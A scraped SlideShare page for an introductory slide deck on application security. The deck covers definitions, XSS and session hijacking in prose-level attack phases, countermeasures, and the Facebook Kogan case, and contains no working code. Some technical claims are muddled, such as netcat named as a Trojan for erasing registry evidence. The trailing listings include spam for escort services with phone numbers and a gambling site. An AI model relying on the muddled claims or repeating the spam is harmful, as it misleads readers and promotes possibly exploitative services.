SlideShare uma empresa Scribd logo

Application security

Transferir como PPTX, PDF
Hagar Alaa el-din
Hagar Alaa el-din

Introduction in Application security

Engenharia
1 de 18
We will cover: • Some basic definitions • Application Security meaning • CIA • Vulnerabilities • Demo attack • Countermeasures • Best practice to build a secure app. • Facebook on Spot
Basic definitions Asset: Resources of value need to be protected Threat: undesired event that may compromise an asset or object , or produce undesired outcome Vulnerability: is the weakness in your system , or in security control, that makes an exploit harm Attack: is an action that utilizes one or more vulnerabilities to realize a threat. Security Control: process or policy put togther to minimize security threats to an acceptable level.
is the use of software, hardware, and procedural methods to protect applications from external threats. Attacks Shift Towards Application Layer % of Dollars 75% “attacks” Application Security
Confidentiality Malware can be written to do directed searches and send confidential data to specific parties Integrity viruses attached and keep themselves resident in the system which allow attacker to completely control a system, this may erase data files, or interfere with application data over time in such a way that data integrity is compromised and data may become completely useless. Availability malware can compromise programs and data to the point where they are no longer available, sometimes this can be a direct denial of service (DoS) attack, and sometimes it is a side effect of the activity of the malware. Application Security aims to secure:
Application Vulnerability A software “vulnerability” leads to process critical data in an insecure way. By exploiting these “holes” in applications, cybercriminals can gain entry into an organization’s systems and steal confidential data. Common software vulnerabilities: • SQL injection • Cross-Site Scripting (XSS). And almost every application has vulnerabilities. about 70% of all applications had at least one vulnerability classified as one of the top 10 web vulnerability types. Commercial software, financial services software, software written by government agencies … all are vulnerable.
Application Vulnerability - Demo Attack Phases of hacker attacks 1-Information • Fingerprinting • Vulnerability DB • Bulletin Boards • ……. 2-Infrastructure • Phishing • Pharming • XSS • ….. 3-Exploit • ….. 4-Keep Access • Backdoor • Trojan • Rootkits • ….. 5-Delete Fingerprints • Destroy evidences • Steganography • Tunneling
Phase 1 (Information) SQL Injection 1. Hacker searches information about victim’s target system Operating System Web Server Database 2. Compares information with vulnerability database 3. Hacker found vulnerability Search for (specific) user Find additional information about user 4. Needs information for next phase of attack Application Vulnerability - Demo Attack
Phase 2 (Infrastructure) Cross Site Scripting (XSS) 1. Hacker found personal information about user e-mail Phone number … 2. Sends e-mail with unsuspicious topic 3. Includes XSS in e-Mail that sends user session to the hackers server 4. User receives e-Mail 5. e-mail is unsuspicious to user Topic Originator 6. Included XSS sends all cookies to hacker’s web site Application Vulnerability - Demo Attack
Phase 3 - Exploit Session hijacking 1. Hacker received all cookies from user 2. Cookies are used to identify users 3. Hacker uses cookie to resume user session 4. Hacker is logged in as user “victim” with user’s access rights o XSS-Proxy is a tool for leveraging Cross-Site-Scripting (XSS) flaws to hijack victim browsers and allows a bi-directional interactive control channel between attacker, victim browser and an XSS vulnerable site Now hacker has logged in to your banking site with your access right. That was just the beginning Application Vulnerability - Demo Attack
• Attacker can implement a sniffer to capture all network traffic • Use a backdoor or trojan to gain repeated access. • May install rootkits in the kernel to get superuser access at the operating system level. • They can then use their access to steal data, consume CPU cycles and exchange confidential information or even resort to extortion. • They can maintain control of their system for a long time by "hardening the system" against other attackers Application Vulnerability - Demo Attack Phase 5 – Delete Fingerprints Phase 4 – Keep Access • Trojans such as ps or netcat are useful to destroy the evidence in the registry files or replace the system binaries with them. • Steganography, is the process of hiding data, for example, in images and sound files. • Tunneling, takes advantage of the transmission protocol by carrying one protocol over another. Even the extra space (unused bits) in the TCP and IP headers can be used to hide information
Application Security Countermeasures • Countermeasures are the actions taken to ensure application security • Application Firewall is the most basic software countermeasure that limits the execution of files or the handling of data by specific installed programs. • Router is the most common hardware countermeasure that can prevent the IP address of an individual computer from being directly visible on the Internet. • Other countermeasures include conventional firewalls, encryption/decryption programs, anti-virus programs, spyware detection/removal programs and biometric authentication systems.
Best Practices to Build Secure Applications 1. Follow the OWASP Top Ten it contains the most critical web application security vulnerabilities, these security vulnerabilities target the confidentiality, integrity, and availability of an application, its developers, and its users. They cover such attack vectors as injection attacks, authentication and session management, security misconfiguration, and sensitive data exposure. 2. Get an Application Security Audit people with specific, professional application security experience, who know what to look for, including the obvious and the subtle, as well as the hidden things. They’ll also be abreast of current security issues and be knowledgeable about issues which aren’t common knowledge yet. 3. Implement Proper Logging When something goes wrong at some stage and there is a bug that no one saw (or considered severe enough to warrant particular attention) one that will eventually be exploited. to be able to respond as quickly as possible ; you need to have proper logging implemented before the situation gets out of hand. Doing so provides you with information about what occurred, what lead to the situation in the first place, and what else was going on at the time. 4. Use Real-time Security Monitoring and Protection or Web Application Firewalls To protect your application from a range of perspectives, both internal and external using Firewalls in addition to Runtime Application Self-Protection (RASP) and services
5. Encrypt Everything It’s important to also make sure that data at rest is encrypted as well as in transit. HTTPS makes it next to impossible for Man In The Middle (MITM) attacks to occur. 6. Harden Everything you need to ensure that everything is sufficiently hardened from operating systems to software development frameworks 7. Keep Your Servers Up to Date make sure that your servers are set to update to the latest security releases as they become available. 8. Keep Your Software Up to Date Applications frameworks and third party software libraries, just like operating systems, have vulnerabilities. If they’re properly supported, then they will also be rapidly patched and improved. So it’s important to ensure that you’re using the latest stable version. 9. Stay Abreast of the Latest Vulnerabilities there are a range of ways in which we can get updated with the number of attack vectors in play today, vectors such as Cross-site scripting, code injection, SQL injection, insecure direct object references, and cross-site request forgery 10. Never Stop Learning that way, you’ll always have it as a key consideration, and be far less likely to fall victim to security or data breaches. Best Practices to Build Secure Applications
Data privacy is a part of information Security & Cyber Security , and any kind of hole in IDOR (Missing Access Control Level) or Data Leakage which exist in GraphQL Wrapper Implementation & Facebook APIs is able to destroy an empire like Facebook IS this related to Information Security!! In USA elections , a quiz app is developed by Kogan for USA residents, and it was aiming to collect users data and their friends, and it did collected data for 50 millions users.
What Facebook Information Security Team will do?! • Review our platform. We will investigate all apps that had access to large amounts of information before we changed our platform in 2014 to reduce data access, and we will conduct a full audit of any app with suspicious activity. If we find developers that misused personally identifiable information, we will ban them from our platform. • Tell people about data misuse. We will tell people affected by apps that have misused their data. This includes building a way for people to know if their data might have been accessed via “thisisyourdigitallife.” Moving forward, if we remove an app for misusing data, we will tell everyone who used it. • Turn off access for unused apps. If someone hasn’t used an app within the last three months, we will turn off the app’s access to their information. • Restrict Facebook Login data. We are changing Login, so that in the next version, we will reduce the data that an app can request without app review to include only name, profile photo and email address. Requesting any other data will require our approval. • Encourage people to manage the apps they use. We already show people what apps their accounts are connected to and control what data they’ve permitted those apps to use. Going forward, we’re going to make these choices more prominent and easier to manage. • Reward people who find vulnerabilities. In the coming weeks we will expand Facebook’s bug bounty program so that people can also report to us if they find misuses of data by app developers.
Application security

Recomendados

Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]David Sweigert
 
DoS or DDoS attack
DoS or DDoS attackDoS or DDoS attack
DoS or DDoS attackstollen_fusion
 
System Security-Chapter 1
System Security-Chapter 1System Security-Chapter 1
System Security-Chapter 1Vamsee Krishna Kiran
 
Intrusion detection
Intrusion detectionIntrusion detection
Intrusion detectionUmesh Dhital
 
Fundamentals of Network security
Fundamentals of Network securityFundamentals of Network security
Fundamentals of Network securityAPNIC
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on itWSO2
 
Social engineering
Social engineering Social engineering
Social engineering Vîñàý Pãtêl
 

Recomendados

Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]David Sweigert
 
DoS or DDoS attack
DoS or DDoS attackDoS or DDoS attack
DoS or DDoS attackstollen_fusion
 
System Security-Chapter 1
System Security-Chapter 1System Security-Chapter 1
System Security-Chapter 1Vamsee Krishna Kiran
 
Intrusion detection
Intrusion detectionIntrusion detection
Intrusion detectionUmesh Dhital
 
Fundamentals of Network security
Fundamentals of Network securityFundamentals of Network security
Fundamentals of Network securityAPNIC
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on itWSO2
 
Social engineering
Social engineering Social engineering
Social engineering Vîñàý Pãtêl
 
Advanced persistent threats(APT)
Advanced persistent threats(APT)Advanced persistent threats(APT)
Advanced persistent threats(APT)Network Intelligence India
 
Cyber security
Cyber securityCyber security
Cyber securityvishakha bhagwat
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITYafaque jaya
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?btpsec
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware AnalysisAndrew McNicol
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Fabiha Shahzad
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
Types of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsTypes of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsLearningwithRayYT
 
Application Security
Application SecurityApplication Security
Application SecurityReggie Niccolo Santos
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case studyAntonio Fontes
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing Netpluz Asia Pte Ltd
 
Malware analysis
Malware analysisMalware analysis
Malware analysisPrakashchand Suthar
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingRaghav Bisht
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)mmubashirkhan
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to CybersecurityKrutarth Vasavada
 
Network Security
Network SecurityNetwork Security
Network Securityforpalmigho
 
Cyber security fundamentals
Cyber security fundamentalsCyber security fundamentals
Cyber security fundamentalsCloudflare
 
Firewall presentation
Firewall presentationFirewall presentation
Firewall presentationTayabaZahid
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Social engineering presentation
Social engineering presentationSocial engineering presentation
Social engineering presentationpooja_doshi
 
Security Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfSecurity Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfAmeliaJonas2
 
Mobile Apps Security Testing -1
Mobile Apps Security Testing -1Mobile Apps Security Testing -1
Mobile Apps Security Testing -1Krisshhna Daasaarii
 

Mais conteúdo relacionado

Mais procurados

NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITYafaque jaya
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?btpsec
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware AnalysisAndrew McNicol
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Fabiha Shahzad
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
Types of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsTypes of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsLearningwithRayYT
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case studyAntonio Fontes
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing Netpluz Asia Pte Ltd
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingRaghav Bisht
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)mmubashirkhan
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to CybersecurityKrutarth Vasavada
 
Network Security
Network SecurityNetwork Security
Network Securityforpalmigho
 
Cyber security fundamentals
Cyber security fundamentalsCyber security fundamentals
Cyber security fundamentalsCloudflare
 
Firewall presentation
Firewall presentationFirewall presentation
Firewall presentationTayabaZahid
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Social engineering presentation
Social engineering presentationSocial engineering presentation
Social engineering presentationpooja_doshi
 

Mais procurados (20)

Advanced persistent threats(APT)
Advanced persistent threats(APT)Advanced persistent threats(APT)
Advanced persistent threats(APT)
 
Cyber security
Cyber securityCyber security
Cyber security
 
NETWORK SECURITY
NETWORK SECURITYNETWORK SECURITY
NETWORK SECURITY
 
What is Penetration Testing?
What is Penetration Testing?What is Penetration Testing?
What is Penetration Testing?
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
 
Types of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsTypes of Threat Actors and Attack Vectors
Types of Threat Actors and Attack Vectors
 
Application Security
Application SecurityApplication Security
Application Security
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case study
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Introduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration TestingIntroduction To Vulnerability Assessment & Penetration Testing
Introduction To Vulnerability Assessment & Penetration Testing
 
Advanced persistent threat (apt)
Advanced persistent threat (apt)Advanced persistent threat (apt)
Advanced persistent threat (apt)
 
Introduction to Cybersecurity
Introduction to CybersecurityIntroduction to Cybersecurity
Introduction to Cybersecurity
 
Network Security
Network SecurityNetwork Security
Network Security
 
Cyber security fundamentals
Cyber security fundamentalsCyber security fundamentals
Cyber security fundamentals
 
Firewall presentation
Firewall presentationFirewall presentation
Firewall presentation
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
Social engineering presentation
Social engineering presentationSocial engineering presentation
Social engineering presentation
 

Semelhante a Application security

Security Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfSecurity Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfAmeliaJonas2
 
Security in Computing and IT
Security in Computing and ITSecurity in Computing and IT
Security in Computing and ITKomalah Nair
 
Best Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docxBest Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docxAfour tech
 
Top 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answerTop 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answerShivamSharma909
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochQA or the Highway
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochQA or the Highway
 
Application security testing an integrated approach
Application security testing an integrated approachApplication security testing an integrated approach
Application security testing an integrated approachIdexcel Technologies
 
Deep Learning based Threat / Intrusion detection system
Deep Learning based Threat / Intrusion detection systemDeep Learning based Threat / Intrusion detection system
Deep Learning based Threat / Intrusion detection systemAffine Analytics
 
23 network security threats pkg
23 network security threats pkg23 network security threats pkg
23 network security threats pkgUmang Gupta
 
Student NameCYB110Playbook Runbook Parts 1-3S.docx
Student NameCYB110Playbook Runbook Parts 1-3S.docxStudent NameCYB110Playbook Runbook Parts 1-3S.docx
Student NameCYB110Playbook Runbook Parts 1-3S.docxdeanmtaylor1545
 
Introduction to Pre-Cybersecurity.pptx
Introduction to Pre-Cybersecurity.pptxIntroduction to Pre-Cybersecurity.pptx
Introduction to Pre-Cybersecurity.pptxyoufanlimboo
 
Chapter1 intro network_security_sunorganised
Chapter1 intro network_security_sunorganisedChapter1 intro network_security_sunorganised
Chapter1 intro network_security_sunorganisedBule Hora University
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security BasicsMohan Jadhav
 
What is penetration testing and why is it important for a business to invest ...
What is penetration testing and why is it important for a business to invest ...What is penetration testing and why is it important for a business to invest ...
What is penetration testing and why is it important for a business to invest ...Alisha Henderson
 
Information security software security presentation.pptx
Information security software security presentation.pptxInformation security software security presentation.pptx
Information security software security presentation.pptxsalutiontechnology
 
Security Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptxSecurity Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptxAmardeepKumar621436
 
SegurançA Da InformaçãO Faat V1 4
SegurançA Da InformaçãO Faat V1 4SegurançA Da InformaçãO Faat V1 4
SegurançA Da InformaçãO Faat V1 4Rodrigo Piovesana
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementMayur Nanotkar
 

Semelhante a Application security (20)

Security Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfSecurity Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdf
 
Mobile Apps Security Testing -1
Mobile Apps Security Testing -1Mobile Apps Security Testing -1
Mobile Apps Security Testing -1
 
Security in Computing and IT
Security in Computing and ITSecurity in Computing and IT
Security in Computing and IT
 
Best Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docxBest Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docx
 
Research Paper
Research PaperResearch Paper
Research Paper
 
Top 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answerTop 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answer
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan Koch
 
The 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan KochThe 5 Layers of Security Testing by Alan Koch
The 5 Layers of Security Testing by Alan Koch
 
Application security testing an integrated approach
Application security testing an integrated approachApplication security testing an integrated approach
Application security testing an integrated approach
 
Deep Learning based Threat / Intrusion detection system
Deep Learning based Threat / Intrusion detection systemDeep Learning based Threat / Intrusion detection system
Deep Learning based Threat / Intrusion detection system
 
23 network security threats pkg
23 network security threats pkg23 network security threats pkg
23 network security threats pkg
 
Student NameCYB110Playbook Runbook Parts 1-3S.docx
Student NameCYB110Playbook Runbook Parts 1-3S.docxStudent NameCYB110Playbook Runbook Parts 1-3S.docx
Student NameCYB110Playbook Runbook Parts 1-3S.docx
 
Introduction to Pre-Cybersecurity.pptx
Introduction to Pre-Cybersecurity.pptxIntroduction to Pre-Cybersecurity.pptx
Introduction to Pre-Cybersecurity.pptx
 
Chapter1 intro network_security_sunorganised
Chapter1 intro network_security_sunorganisedChapter1 intro network_security_sunorganised
Chapter1 intro network_security_sunorganised
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security Basics
 
What is penetration testing and why is it important for a business to invest ...
What is penetration testing and why is it important for a business to invest ...What is penetration testing and why is it important for a business to invest ...
What is penetration testing and why is it important for a business to invest ...
 
Information security software security presentation.pptx
Information security software security presentation.pptxInformation security software security presentation.pptx
Information security software security presentation.pptx
 
Security Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptxSecurity Threats and Vulnerabilities-2.pptx
Security Threats and Vulnerabilities-2.pptx
 
SegurançA Da InformaçãO Faat V1 4
SegurançA Da InformaçãO Faat V1 4SegurançA Da InformaçãO Faat V1 4
SegurançA Da InformaçãO Faat V1 4
 
Advanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security ManagementAdvanced Persistent Threats (APTs) - Information Security Management
Advanced Persistent Threats (APTs) - Information Security Management
 

Último

(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escortsranjana rawat
 
APPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICS
APPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICSAPPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICS
APPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICSKurinjimalarL3
 
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...ranjana rawat
 
Introduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxIntroduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxupamatechverse
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlysanyuktamishra911
 
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escortsranjana rawat
 
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...ranjana rawat
 
Coefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxCoefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxAsutosh Ranjan
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Call Girls in Nagpur High Profile
 
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICS
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICSHARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICS
HARDNESS, FRACTURE TOUGHNESS AND STRENGTH OF CERAMICSRajkumarAkumalla
 
Microscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptxMicroscopic Analysis of Ceramic Materials.pptx
Microscopic Analysis of Ceramic Materials.pptxpurnimasatapathy1234
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Call Girls in Nagpur High Profile
 
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130
VIP Call Girls Service Kondapur Hyderabad Call +91-8250192130Suhani Kapoor
 
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...Dr.Costas Sachpazis
 
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINEMANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINESIVASHANKAR N
 
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...
Sheet Pile Wall Design and Construction: A Practical Guide for Civil Engineer...Dr.Costas Sachpazis
 
SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )SPICE PARK APR2024 ( 6,793 SPICE Models )
SPICE PARK APR2024 ( 6,793 SPICE Models )Tsuyoshi Horigome
 
Introduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxIntroduction to Multiple Access Protocol.pptx
Introduction to Multiple Access Protocol.pptxupamatechverse
 
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Service
(RIA) Call Girls Bhosari ( 7001035870 ) HI-Fi Pune Escorts Serviceranjana rawat
 

Último (20)

(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
(MEERA) Dapodi Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Escorts
 
APPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICS
APPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICSAPPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICS
APPLICATIONS-AC/DC DRIVES-OPERATING CHARACTERISTICS
 
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
The Most Attractive Pune Call Girls Manchar 8250192130 Will You Miss This Cha...
 
Introduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxIntroduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptx
 
KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghly
 
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINEDJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
DJARUM4D - SLOT GACOR ONLINE | SLOT DEMO ONLINE
 
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur EscortsHigh Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
High Profile Call Girls Nagpur Isha Call 7001035870 Meet With Nagpur Escorts
 
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
(SHREYA) Chakan Call Girls Just Call 7001035870 [ Cash on Delivery ] Pune Esc...
 
Coefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptxCoefficient of Thermal Expansion and their Importance.pptx
Coefficient of Thermal Expansion and their Importance.pptx
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
